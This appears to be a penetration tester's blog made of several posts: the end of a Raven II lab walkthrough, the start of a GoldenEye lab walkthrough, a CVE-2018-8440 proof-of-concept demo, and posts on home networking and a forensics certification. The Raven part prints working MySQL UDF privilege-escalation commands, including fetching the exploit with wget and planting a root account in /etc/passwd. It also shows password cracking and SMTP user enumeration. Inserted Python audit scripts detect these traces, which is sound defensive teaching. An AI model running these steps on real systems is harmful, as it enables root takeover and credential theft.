[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
- Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit || http://www.exploit-db.com/exploits/5720 || Language=python
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
...
I’ve seen and used this before. This exploit allows you to write and access files as root within mysql. This essentially allows you to own the box as you can create new users, modify existing and/or basically do anything you like!
First I download the exploit to the target using the python SimpleHTTPServer and wget.
www-data@Raven:/var/www$ wget http://192.168.253.131/1518.c
wget http://192.168.253.131/1518.c
converted 'http://192.168.253.131/1518.c' (ANSI_X3.4-1968) -> 'http://192.168.253.131/1518.c' (UTF-8)
--2019-02-03 08:18:09-- http://192.168.253.131/1518.c
Connecting to 192.168.253.131:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3378 (3.3K) [text/plain]
Saving to: '1518.c'
1518.c 100%[=====================>] 3.30K --.-KB/s in 0s
2019-02-03 08:18:09 (705 MB/s) - '1518.c' saved [3378/3378]
www-data@Raven:/var/www$
Following the exploit instructions I rename and compile it:
www-data@Raven:/var/www$ mv 1518.c n33dle.c
mv 1518.c n33dle.c
www-data@Raven:/var/www$ gcc -g -c n33dle.c
gcc -g -c n33dle.c
root@kali:~/Documents/raven# gcc -g -shared -Wl,-soname,n33dle.so -o n33dle.so n33dle.o -lc
gcc -g -shared -Wl,-soname,n33dle.so -o n33dle.so n33dle.o -lc
With the n33dle.so SUID file created, I log back into the mysql db and follow the rest of the exploit instructions.
mysql> use mysql;
use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> create table foo(line blob);
create table foo(line blob);
Query OK, 0 rows affected (0.01 sec)
mysql> insert into foo values(load_file('/var/www/n33dle.so'));
insert into foo values(load_file('/var/www/n33dle.so'));
Query OK, 1 row affected (0.02 sec)
mysql> select * from foo into dumpfile '/var/www/n33dle.so';
select * from foo into dumpfile '/var/www/n33dle.so';
ERROR 1086 (HY000): File '/var/www/n33dle.so' already exists
mysql> select * from foo into dumpfile '/usr/lib/n33dle.so';
select * from foo into dumpfile '/usr/lib/n33dle.so';
Query OK, 1 row affected (0.01 sec)
mysql> create function do_system returns integer soname 'n33dle.so';
create function do_system returns integer soname 'n33dle.so';
Query OK, 0 rows affected (0.00 sec)
mysql> select * from mysql.func;
select * from mysql.func;
+-----------+-----+-----------+----------+
| name | ret | dl | type |
+-----------+-----+-----------+----------+
| do_system | 2 | n33dle.so | function |
+-----------+-----+-----------+----------+
1 row in set (0.00 sec)
What I’ve done here is essentially link the do_system function to a SUID n33dle.so file. This can now be called within mysql to execute any system command as root. A cool trick I’ve found is creating a new root user. In the past I’ve modified the existing root user, removing the ‘x’ from /etc/passwd. This would allow me to su to root without a password. However, this will most likely break the system and cause a DoS. So instead, let's create a new root user with a password I’ve set.
On my Kali box, I create the hashed password of ‘n33dle’.
root@kali:~/Documents/raven# openssl passwd n33dle
RHV9/0Q6VW2nI
Using the hashed password above, I call the do_system function in the mysql database and echo a new line into the Raven /etc/passwd file. This creates a new root level user with a username and password of n33dle:n33dle:
mysql> select do_system('echo "n33dle:RHV9/0Q6VW2nI:0:0:root:/root:/bin/bash" >> /etc/passwd');
<ho "n33dle:RHV9/0Q6VW2nI:0:0:root:/root:/bin/bash" >> /etc/passwd');
+----------------------------------------------------------------------------------+
| do_system('echo "n33dle:RHV9/0Q6VW2nI:0:0:root:/root:/bin/bash" >> /etc/passwd') |
+----------------------------------------------------------------------------------+
| 0 |
+----------------------------------------------------------------------------------+
1 row in set (0.00 sec)
Exit out of the mysql db and it’s as easy as changing to the newly created root user ‘n33dle’:
www-data@Raven:/var/www$ su n33dle
su n33dle
Password: n33dle
root@Raven:/var/www# id
id
uid=0(root) gid=0(root) groups=0(root)
root@Raven:/var/www# whoami
whoami
root
root@Raven:/var/www#
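From the blue-team side, the escalation above leaves three cheap-to-check artefacts: a mysqld process running as root (a UDF runs with the privileges of the database process, which is what lets it write into /usr/lib), an unexpected shared object registered in mysql.func, and an extra UID 0 entry in /etc/passwd with a hash placed directly in the password field. The following audit is an added example of my own (not part of the walkthrough and not linuxprivchecker.py); the sample /etc/passwd, mysql.func rows and ps output are constructed for the example, with the n33dle line copied from the command shown earlier.

```python
# Constructed sample inputs (assumed), modelled on the outputs in the walkthrough.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:110:116:MySQL Server,,,:/nonexistent:/bin/false
michael:x:1000:1000:michael,,,:/home/michael:/bin/bash
steven:x:1001:1001::/home/steven:/bin/sh
n33dle:RHV9/0Q6VW2nI:0:0:root:/root:/bin/bash
"""

# Rows as returned by `select name, dl from mysql.func;`
SAMPLE_FUNC_ROWS = [("do_system", "n33dle.so")]

# Lines as returned by `ps -eo user,args`
SAMPLE_PS = [
    "USER COMMAND",
    "root /usr/sbin/mysqld",
    "www-data /usr/sbin/apache2 -k start",
]


def audit_passwd(text):
    """Return (line_no, finding, account) tuples for suspicious /etc/passwd entries.

    Flags extra UID 0 accounts, entries carrying a password hash in the
    second field (a shadowed system keeps 'x' there), and malformed lines.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, "malformed entry", line))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and name != "root":
            findings.append((lineno, "extra uid 0 account", name))
        if pw not in ("x", "*", "!", ""):
            findings.append((lineno, "password hash in /etc/passwd", name))
    return findings


def audit_udfs(rows, expected=frozenset()):
    """Return (name, dl) pairs from mysql.func whose shared object is not on
    the allow-list. On a stock WordPress/MySQL host the table should be empty."""
    return [(name, dl) for name, dl in rows if dl not in expected]


def mysqld_as_root(ps_lines):
    """Return True if any `ps -eo user,args` line shows mysqld owned by root."""
    for line in ps_lines:
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0] == "root" and "mysqld" in parts[1]:
            return True
    return False


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print("passwd:", finding)
    for name, dl in audit_udfs(SAMPLE_FUNC_ROWS):
        print("unexpected UDF %s -> %s" % (name, dl))
    print("mysqld runs as root:", mysqld_as_root(SAMPLE_PS))
```

On a live host the same functions take `open('/etc/passwd').read()`, the rows from the mysql.func query and `ps -eo user,args` output; running mysqld as an unprivileged user and keeping plugin_dir unwritable by the database removes the precondition that the whole chain relied on.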
And there we have it, I’m now root! To finish it off, the final flag:
root@Raven:/var/www# cd /root
cd /root
root@Raven:~# ls
ls
flag4.txt
root@Raven:~# cat flag4.txt
cat flag4.txt
___ ___ ___
| _ \__ ___ _____ _ _ |_ _|_ _|
| / _` \ V / -_) ' \ | | | |
|_|_\__,_|\_/\___|_||_|___|___|
flag4{df2bc5e951d91581467bb9a2a8ff4425}
CONGRATULATIONS on successfully rooting RavenII
I hope you enjoyed this second interation of the Raven VM
Hit me up on Twitter and let me know what you thought:
@mccannwj / wjmccann.github.io
root@Raven:~#
The password crack ended up finishing and locating steven’s password:
root@kali:~/Documents/raven# john --wordlist=/usr/share/wordlists/rockyou.txt pwords
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
LOLLOL1 (?)
1g 0:00:41:01 DONE (2019-02-03 08:47) 0.000406g/s 5827p/s 6253c/s 6253C/s ..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed
I tried to SSH as steven, but that didn’t work. Given they are WordPress creds, they did however let me log in to the Wordpress admin portal. Perhaps there’s some other vuln here... Anyway, I’m done!
Hope you enjoyed.
--> n33dle
Thursday 18 October 2018
On the Ubiquiti bandwagon
Bit of a different post than usual.
I recently joined the seemingly popular Ubiquiti cult of networking devices at home. I've read about these a lot, and heard nothing but good things. I've also wanted to improve my home network, especially having some intelligence on what's talking to what, by whom and where.
For the last few years, I've been using a Netgear router running DD-WRT which I installed.
It's been fantastic, and has served me very well. Its SPI firewall is leaps and miles ahead of any factory router firmware, and the level of control has been great. I heavily used the OpenVPN server to VPN home for checking my NVR/IP cameras, while restricting their ability to access the internet.
If I had time, I'd build more upon my home lab to ingest a lot of the syslog generated from the DD-WRT router, including netflow traffic, and even thought about introducing PFSense and Security Onion.
Then I thought, based on the reviews, how about I just throw a few hundred bucks at Ubiquiti and let it (supposedly) do it all for me!
This is what ~$900 gives you:
- Ubiquti 24 port POE switch
- Ubiquiti Security Gateway
- Ubiquiti AC-PRO Wireless AP
And here it is all wired up in my (ghetto) rack:
I didn't buy the official cloud key, and instead opted to install the UniFi controller (UniFiPi) on a spare RP3 I had. I tell you what, save yourself $$$ and use the RP. While I can't compare it to the cloud key, UniFiPi on my RP3 has been running flawlessly.
Check out UniFiPi here: https://unifipi.com/
What's the difference between the cloud key and UniFiPi? Not much. See here:
https://unifipi.com/2018/10/08/unifipi-vs-cloud-key/
In terms of installing and setup, it literally is plug it all in, access your UniFi controller, adopt all UniFi devices into your network and magic happens. Done.
Within a few minutes, the Deep Packet Inspection (DPI) on the security gateway immediately started analysing net-flow traffic and presenting it all in a nice pretty dashboard.
Some examples:
UniFi adopted devices:
Connected clients:
Summary of traffic:
Deep dive into PC traffic:
I've only had this running for a day. I need to spend more time on understanding what data is available. I want to implement an L2TP VPN back home, using 2FA with Google Authenticator. I've also enabled the IDS/IPS. Luckily the dashboard is empty :)
So happy with my purchase and I highly recommend for a no fuss setup if you're looking for a product to understand your home network more.
--> n33dle
Sunday 23 September 2018
GIAC Certified Forensic Analyst (GCFA) – PASSED
I recently sat and successfully obtained my GIAC Certified Forensic Analyst certification and thought I'd write a small post about it. What a year it’s been of study. I started my OSCP in early February. As per my previous post about it, it was a brutal 90 days of persistence, patience and suffering :)
After passing my OSCP, I had about 1 week of ‘free time’ before attending the SANS event for the FOR508: Advanced Digital Forensics and Incident Response course. I had this already booked from late 2017. So I knew it was coming, which I guess added to my stress of passing the OSCP first time and quickly.
--> What is it?
The course was great, it was the usual SANS format which entailed 6 days of lecturing from industry experts. The courses themselves are always valuable, not just from the content, but from the stories of people in the industry. You get real-life examples of how the content you’re learning is applied in day-to-day work.
There’s a lot covered in the course and at a high level:
- The incident response, threat intelligence & threat hunting process
- Cyber kill chain and Mitre ATT&CK models
- In-depth memory forensics
- Finding evidence of malware and answering (who, how, why?!)
- Carving out artefacts to create a ‘story’ and timeline of what happened
- In-depth look of the Windows file-system and how it all works
--> Study tips
This is my 3rd SANS certification and I think I’ve now got the hang of studying for these. During the course week, I tend to just listen as much as I can and not really focus on the books. Tip: get the most out of being there. It’s how you study later in your own time that passes the exam. While you’re there, just enjoy it. You’ve probably paid good $$$ for it too!
After the course, I take a few weeks away from it then get into studying. My method is simple, read the books and create an index.
The exam is open book where you can bring in an armful of written content. The best and only content you need is the official books and an index of keywords and page numbers.
I give all books a thorough read-through, highlighting keywords, statements and points. This can take a while, if not weeks. Once I’ve gone through all books, I do it again, this time creating an index in Excel which is simply:
Keyword, Book Number, Page number.
For this certification, my index was 18 pages long. After I’ve completed the second read-through and built this index, it’s time to sit a practice exam. My advice: sit them as you would the real exam. Set aside 3 hours of uninterrupted time, only using what you’d bring into the exam. I passed my first test with 73% (just scraped through). The pass mark is 71%.
At the end, a summary is provided. Use this to focus on areas where you should devote more time.
In the end, I passed my exam with 88% and only 37 seconds to spare! It was a nerve-wracking final 5 minutes.
I could definitely tell during my second read-through of this course I was ‘burnt-out’ with study. Having just finished the OSCP where I dedicated easily 300-500 hours, I had one week break, then onto the GCFA.
--> Why the GCFA?
You might be wondering why I did a forensics course/certification after my OSCP? Simple. I’m passionate about all things security and an advocate for learning both sides of the story. A great blue-teamer should have an understanding of how their adversary is attacking them. Likewise for a penetration tester. Understanding how your actions will be detected, what footprint you’ll leave behind and how you may (or may not) be detected, can only do you justice in rounding out your skills.
I’ve learnt great techniques to help me with my journey as a penetration tester. There are definitely ways in which forensics can be used for the offensive. Why try and break through a hardened host with multiple layers of security? For example, if you can obtain or somehow gain access to a hypervisor with the right privileges, and take snapshots or memory of servers, it makes hacking easy.
Once you have a memory image, you’re not restricted by defensive security products and Windows security controls. You have free rein access to data. At the end of the day, that’s what an attacker/pentester is after. Data.
I’m amazed at how mature forensic tools have become. I can’t imagine how a lot of this would have been done 20-30 years ago. Now, it literally is just mounting an image, running some tools to get what you need. It’s great, and kudos to all the developers of forensic tools.
--> Next certification?
You cray! For now, I think it’s time to rest the brain. But I’m keen to attack a CREST certification or the OSWP. Perhaps in 2019.
--> n33dle
Thursday 13 September 2018
A look (and play) into CVE-2018-8440. The Windows ALPC Elevation of Privilege Vulnerability
--> So what is it?
On Aug 27, freelance researcher @SandboxEscaper let loose a POC 0-day privilege escalation affecting all versions of Windows.
From what I gather, the vulnerability was not responsibly disclosed. There was some banter on Twitter towards SandboxEscaper…
A few days later, Acros Security, a security research company in Slovenia released an unofficial patch. Eventually, Microsoft released an official patch as part of the September Patch Tuesday on the 10th.
As detailed in VU#906424, a flaw exists in the way the SchRpcSetSecurity API (part of the Windows Task Scheduler) handles the Advanced Local Procedure Call (ALPC) interface. This can be leveraged to overwrite protected system files to which an authenticated user does not have access.
--> Let’s play with the poc
First, fire up my Windows 10 vm, and make sure I’m a regular low-privileged user
Let’s check the spoolsv.exe service through process explorer. As below, no child process is spawned or running:
Now I open notepad (PID 1988). As below, running as n33dle (low-priv) user:
Now let’s inject this process into spoolsv using the poc exploit:
And there you have it… notepad.exe now running as NT AUTHORITY\SYSTEM as a child process from spoolsv.exe.
--> Mitigation/Remediation
1. Ultimately, patch systems as per CVE-2018-8440 (Microsoft September Security Updates).
2. Not recommended, but you could modify the NTFS ACL on the Tasks directory under C:\windows, removing the Authenticated Users group and denying the SYSTEM user:
--> icacls c:\windows\tasks /remove:g "Authenticated Users"
--> icacls c:\windows\tasks /deny system:(OI)(CI)(WD,WDAC)
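Besides patching, the footprint the PoC leaves (a child of spoolsv.exe running as SYSTEM, as seen above) is easy to hunt for in process-creation telemetry. This is an added example, not from the original post: it parses constructed Sysmon-style records (field names assumed to follow Sysmon Event ID 1, values made up) and flags any unexpected child of spoolsv.exe.

```python
"""Added example (not from the original post): hunt for the footprint the
ALPC PoC leaves in process-creation telemetry, a child of spoolsv.exe
(here notepad.exe) running as NT AUTHORITY\\SYSTEM."""
import re

# Constructed sample records. Field names follow Sysmon Event ID 1
# (ProcessCreate); PIDs, users and timestamps are made up for this example.
SAMPLE_EVENTS = r"""
UtcTime=2018-09-13 10:01:02 ProcessId=1988 Image=C:\Windows\System32\notepad.exe User=DESKTOP\n33dle ParentProcessId=4420 ParentImage=C:\Windows\explorer.exe
UtcTime=2018-09-13 10:01:40 ProcessId=2216 Image=C:\Windows\System32\notepad.exe User=NT AUTHORITY\SYSTEM ParentProcessId=1364 ParentImage=C:\Windows\System32\spoolsv.exe
UtcTime=2018-09-13 10:02:11 ProcessId=2300 Image=C:\Windows\System32\svchost.exe User=NT AUTHORITY\SYSTEM ParentProcessId=612 ParentImage=C:\Windows\System32\services.exe
UtcTime=2018-09-13 10:03:05 ProcessId=2410 Image=C:\Windows\System32\PrintIsolationHost.exe User=NT AUTHORITY\SYSTEM ParentProcessId=1364 ParentImage=C:\Windows\System32\spoolsv.exe
"""

# Split only on spaces that start a new key=value pair, so values such as
# "NT AUTHORITY\SYSTEM" or the UtcTime stay intact.
FIELD_SPLIT = re.compile(r" (?=[A-Za-z]+=)")


def parse_events(text):
    """Turn key=value records (one per line) into a list of dicts."""
    events = []
    for line in text.strip().splitlines():
        fields = {}
        for chunk in FIELD_SPLIT.split(line.strip()):
            key, _, value = chunk.partition("=")
            fields[key] = value
        events.append(fields)
    return events


def basename(path):
    """Last path component, lower-cased, for either separator style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_spoolsv_children(events, allowed_children=("printisolationhost.exe",)):
    """Return events whose parent is spoolsv.exe and whose image is not an
    allowed spooler helper. The Process Explorer check in the post showed the
    spooler spawning nothing at all; the print driver isolation host is listed
    here only as an assumed allowlist entry for environments that do see it."""
    hits = []
    for ev in events:
        if basename(ev.get("ParentImage", "")) != "spoolsv.exe":
            continue
        if basename(ev.get("Image", "")) in allowed_children:
            continue
        # A SYSTEM child is the exact PoC outcome; anything else is still odd.
        is_system = ev.get("User", "").upper().endswith("\\SYSTEM")
        hits.append({**ev,
                     "Severity": "high" if is_system else "medium",
                     "Reason": "unexpected child of spoolsv.exe"})
    return hits


if __name__ == "__main__":
    for hit in find_spoolsv_children(parse_events(SAMPLE_EVENTS)):
        print(hit["Severity"], hit["UtcTime"], hit["Image"],
              "as", hit["User"], "under", hit["ParentImage"])
```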
That’s it for now. I’m going to look into the source code and see if I can spawn a SYSTEM command shell. Will need to modify the resource.aps source file, as that is used to compile the DLL which is injected into the spoolsv service.
--> n33dle
Sunday 19 August 2018
Vulnhub Walkthrough - Goldeneye
Took a while with this one, was only doing a bit here and there when I had the chance.
This one was fun. Some of the initial recon was more puzzle than real-world, but still enjoyable.
Initial compromise was via an exploit in the Moodle web application, then escalated to root through the infamous overlayfs Ubuntu/Linux Kernel exploit.
You can grab this vulnhub machine from here:
https://www.vulnhub.com/entry/goldeneye-1,240/
--> MISSION
The goal is to get root and capture the secret GoldenEye codes - flag.txt.
My target machine IP address is 192.168.111.128
--> REC0N / ENUMERATION
Let's start off with a full port scan:
root@kali:~# nmap -n -v -p- -T4 -sS 192.168.111.128
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-14 06:10 EDT
Initiating ARP Ping Scan at 06:10
Scanning 192.168.111.128 [1 port]
Completed ARP Ping Scan at 06:10, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 06:10
Scanning 192.168.111.128 [65535 ports]
Discovered open port 80/tcp on 192.168.111.128
Discovered open port 25/tcp on 192.168.111.128
Discovered open port 55007/tcp on 192.168.111.128
Discovered open port 55006/tcp on 192.168.111.128
Completed SYN Stealth Scan at 06:10, 1.69s elapsed (65535 total ports)
Nmap scan report for 192.168.111.128
Host is up (0.00081s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
55006/tcp open unknown
55007/tcp open unknown
And a UDP scan using udp-proto-scanner:
root@kali:~# udp-proto-scanner.pl 192.168.111.128
Starting udp-proto-scanner v1.1 ( http://labs.portcullis.co.uk/application/udp-proto-scanner ) on Tue Aug 14 06:13:07 2018
================================================================================
Bandwith: .................... 250k bits/second
Max Probes per host: ......... 3
Config file: ................. /usr/local/bin/udp-proto-scanner.conf
Probes names: ................ DNSStatusRequest,DNSVersionBindReq,NBTStat,NTPRequest,RPCCheck,SNMPv3GetRequest,chargen,citrix,daytime,db2,echo,gtpv1,ike,ms-sql,ms-sql-slam,netop,ntp,rpc,snmp-public,systat,tftp,time,xdmcp
================================================================================
Sending DNSStatusRequest probes to 1 hosts...
Sending DNSVersionBindReq probes to 1 hosts...
Sending NBTStat probes to 1 hosts...
Sending NTPRequest probes to 1 hosts...
Sending RPCCheck probes to 1 hosts...
Sending SNMPv3GetRequest probes to 1 hosts...
Sending chargen probes to 1 hosts...
Sending citrix probes to 1 hosts...
Sending daytime probes to 1 hosts...
Sending db2 probes to 1 hosts...
Sending echo probes to 1 hosts...
Sending gtpv1 probes to 1 hosts...
Sending ike probes to 1 hosts...
Sending ms-sql probes to 1 hosts...
Sending ms-sql-slam probes to 1 hosts...
Sending netop probes to 1 hosts...
Sending ntp probes to 1 hosts...
Sending rpc probes to 1 hosts...
Sending snmp-public probes to 1 hosts...
Sending systat probes to 1 hosts...
Sending tftp probes to 1 hosts...
Sending time probes to 1 hosts...
Sending xdmcp probes to 1 hosts...
Scan complete at Tue Aug 14 06:13:59 2018
I've got tcp/80, tcp/25, tcp/55006 and tcp/55007 to work with.
Let's check out the web page:
Cool little console animation plays. I check the source and the javascript that's running is terminal.js.
This holds something interesting in its source!
var data = [
  { GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>" }
];
//
//Boris, make sure you update your default password.
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//InvincibleHack3r
//
//BTW Natalya says she can break your codes
//
var allElements = document.getElementsByClassName("typeing");
for (var j = 0; j < allElements.length; j++) {
  var currentElementId = allElements[j].id;
  var currentElementIdContent = data[0][currentElementId];
  var element = document.getElementById(currentElementId);
  var devTypeText = currentElementIdContent;
  var i = 0, isTag, text;
  (function type() {
    text = devTypeText.slice(0, ++i);
    if (text === devTypeText) return;
    element.innerHTML = text + `<span class='blinker'> </span>`;
    var char = text.slice(-1);
    if (char === "<") isTag = true;
    if (char === ">") isTag = false;
    if (isTag) return type();
    setTimeout(type, 60);
  })();
}
Whatever this is, it's encoded:
InvincibleHack3r
Through google I find it's HTML encoded. I run it through a decoding site which gives me:
InvincibleHack3r
Most likely creds!
So I try username boris and password InvincibleHack3r on http://192.168.111.128/sev-home/
We're in!
Nothing really to look at. So I go back to my nmap scan. This time I run a more aggressive scan on the discovered ports:
root@kali:~# nmap -n -v -p 25,80,55007,55006 -T4 -sS -A 192.168.111.128
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-14 06:36 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:36
Completed NSE at 06:36, 0.00s elapsed
Initiating NSE at 06:36
Completed NSE at 06:36, 0.00s elapsed
Initiating Ping Scan at 06:36
Scanning 192.168.111.128 [4 ports]
Completed Ping Scan at 06:36, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 06:36
Scanning 192.168.111.128 [4 ports]
Discovered open port 25/tcp on 192.168.111.128
Discovered open port 80/tcp on 192.168.111.128
Discovered open port 55006/tcp on 192.168.111.128
Discovered open port 55007/tcp on 192.168.111.128
Completed SYN Stealth Scan at 06:36, 0.06s elapsed (4 total ports)
Initiating Service scan at 06:36
Scanning 4 services on 192.168.111.128
Completed Service scan at 06:36, 31.03s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.111.128
Initiating Traceroute at 06:36
Completed Traceroute at 06:36, 0.02s elapsed
NSE: Script scanning 192.168.111.128.
Initiating NSE at 06:36
Completed NSE at 06:37, 28.59s elapsed
Initiating NSE at 06:37
Completed NSE at 06:37, 0.01s elapsed
Nmap scan report for 192.168.111.128
Host is up (0.00052s latency).
PORT STATE SERVICE VERSION
25/tcp open smtp
| fingerprint-strings:
| Hello:
| 220 ubuntu GoldentEye SMTP Electronic-Mail agent
|_ Syntax: EHLO hostname
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: USER CAPA SASL(PLAIN) AUTH-RESP-CODE PIPELINING RESP-CODES UIDL TOP
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after: 2028-04-23T03:23:52
| MD5: d039 2e71 c76a 2cb3 e694 ec40 7228 ec63
|_SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77
|_ssl-date: TLS randomness does not represent time
55007/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE RESP-CODES UIDL TOP STLS SASL(PLAIN) CAPA USER PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after: 2028-04-23T03:23:52
| MD5: d039 2e71 c76a 2cb3 e694 ec40 7228 ec63
|_SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.70%I=7%D=8/14%Time=5B72B0A8%P=x86_64-pc-linux-gnu%r(Hell
SF:o,4D,"220\x20ubuntu\x20GoldentEye\x20SMTP\x20Electronic-Mail\x20agent\r
SF:\n501\x20Syntax:\x20EHLO\x20hostname\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose
Running: Actiontec embedded, Linux 2.4.X|3.X
OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:2.4.37 cpe:/o:linux:linux_kernel:3.2
OS details: Actiontec MI424WR-GEN3I WAP, DD-WRT v24-sp2 (Linux 2.4.37), Linux 3.2
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
While I'm at it, I check boris and natalya are valid users through the SMTP vrfy function:
root@kali:~# nc -nv 192.168.111.128 25
(UNKNOWN) [192.168.111.128] 25 (smtp) open
EHLO hostname
220 ubuntu GoldentEye SMTP Electronic-Mail agent
250-ubuntu
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
vrfy boris
252 2.0.0 boris
vrfy natalya
252 2.0.0 natalya
vrfy doesnotexist
550 5.1.1 <doesnotexist>: Recipient address rejected: User unknown in local recipient table
vrfy bond
550 5.1.1 <bond>: Recipient address rejected: User unknown in local recipient table
vrfy james
550 5.1.1 <james>: Recipient address rejected: User unknown in local recipient table
I also run a nikto scan on the site... hmm nothing exciting:
root@kali:~/Documents/vulnhub/goldeneye# nikto -h http://192.168.111.128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.111.128
+ Target Hostname: 192.168.111.128
+ Target Port: 80
+ Start Time: 2018-08-14 06:53:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xfc 0x56aba821be9ed
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
+ Scan terminated: 20 error(s) and 4 item(s) reported on remote host
+ End Time: 2018-08-14 06:53:44 (GMT-4) (0 seconds)
---------------------------------------------------------------------------
Site backend looks to be running moodle. As per google "Moodle is a free and open-source learning management system written in PHP and distributed under the GNU General Public License"
Any exploits:
root@kali:~# searchsploit moodle
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Mambo Component Mam-Moodle alpha - Remote File Inclusion | exploits/php/webapps/2064.txt
Moodle - Remote Command Execution (Metasploit) | exploits/linux/remote/29324.rb
Moodle 1.1/1.2 - Cross-Site Scripting | exploits/php/webapps/24071.txt
Moodle 1.5.2 - 'moodledata' Remote Session Disclosure | exploits/php/webapps/3508.txt
Moodle 1.5/1.6 - '/mod/forum/discuss.php?navtail' Cross-Site Scripting | exploits/php/webapps/29284.txt
Moodle 1.6dev - SQL Injection / Command Execution | exploits/php/webapps/1312.php
Moodle 1.7.1 - 'index.php' Cross-Site Scripting | exploits/php/webapps/30261.txt
Moodle 1.8.3 - 'install.php' Cross-Site Scripting | exploits/php/webapps/31020.txt
Moodle 1.8.4 - Remote Code Execution | exploits/php/webapps/6356.php
Moodle 1.9.3 - Remote Code Execution | exploits/php/webapps/7437.txt
Moodle 1.x - 'post.php' Cross-Site Scripting | exploits/php/webapps/24356.txt
Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting | exploits/php/webapps/35297.txt
Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities | exploits/php/webapps/28174.txt
Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting | exploits/php/webapps/36418.txt
Moodle 2.7 - Persistent Cross-Site Scripting | exploits/php/webapps/34169.txt
Moodle 2.x/3.x - SQL Injection | exploits/php/webapps/41828.php
Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure | exploits/php/webapps/8297.txt
Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection | exploits/php/webapps/28770.txt
Moodle Help Script 1.x - Cross-Site Scripting | exploits/php/webapps/24279.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Just a few :)
Might be some interesting things to try here. RFI and RCE. But first I'll have a look around on the page. I have those xenia creds that'll probably come in use somewhere...
